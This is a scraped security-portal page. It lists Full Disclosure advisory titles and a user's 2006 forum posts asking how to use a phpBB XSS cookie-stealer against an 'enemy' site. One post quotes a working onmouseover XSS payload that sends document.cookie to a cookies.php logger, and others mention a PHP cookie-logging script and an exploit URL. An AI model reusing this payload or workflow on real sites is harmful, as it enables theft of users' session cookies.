 |
Menu |
 |
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
 |
User Info |
 |
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 246
Members: 0
Total: 246
|
|
|
|
|
 |
Full disclosure |
 |
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
|
I did it but...
It just like appeared...with the code. |
|
|
|
|
Hey,
I just need a little matter cleared up.
On the phpbb 2.0.16 cookie stealer thingy, the code looks summin like this:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font ... |
|
|
Forum:PhpBB Posted: Sun Apr 09, 2006 7:59 am Subject: l |
|
|
|
Where shall I put my log. On the server?  |
|
|
Forum:PhpBB Posted: Sat Apr 08, 2006 7:05 am Subject: l |
|
|
|
Where is my log.txt I didnt make one, I just have my cookies.php  |
|
|
Forum:PhpBB Posted: Fri Apr 07, 2006 5:11 pm Subject: l |
|
|
|
Ok this confuses me, I have viewed the video.
And Have tried to follow as best as I could here is what happens:
1. I copied that script and placed it as cookies.php on the server.
2. Then I a ... |
|
|
|
|
Do I change the server to MY website or the 'enemys' website host.
If its the person im trying to hack, how do I get their server details?  |
|
|
|
|
Ok, Now this forum has a 2.0.18.
Therefore, I use this:
<pre a=">" onmouseover='document.location="http://localhost/cookies.php?c="+document.cookie' b="<pre" >
http://www.punchstoc ... |
|
|
|
|
Cheers man, works like a teapot. |
|
|
|
|
Ok, So I have the site I have the exploits but I dont know which to use.
How do I find out which version they have.  |
|
|
Forum:PhpBB Posted: Fri Apr 07, 2006 12:28 pm Subject: l |
|
|
|
http://kisobox.com/exploits/phpbb.2.0.17.xss+cookies.stealer.txt
On there it has a script,
cookies.php
<?php
$cookie = $_GET
How do I use this Do I fill in the ... |
|
|
|
|
Hey,
Im new so please bare with me
Anyhow, I have looked on the forum and seen stuff about the MD5 hashs, however, It doesnt say how to get access them.
So can anyone tell me, how to act ... |
|
|
Page 1 of 1 |
All times are GMT |
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|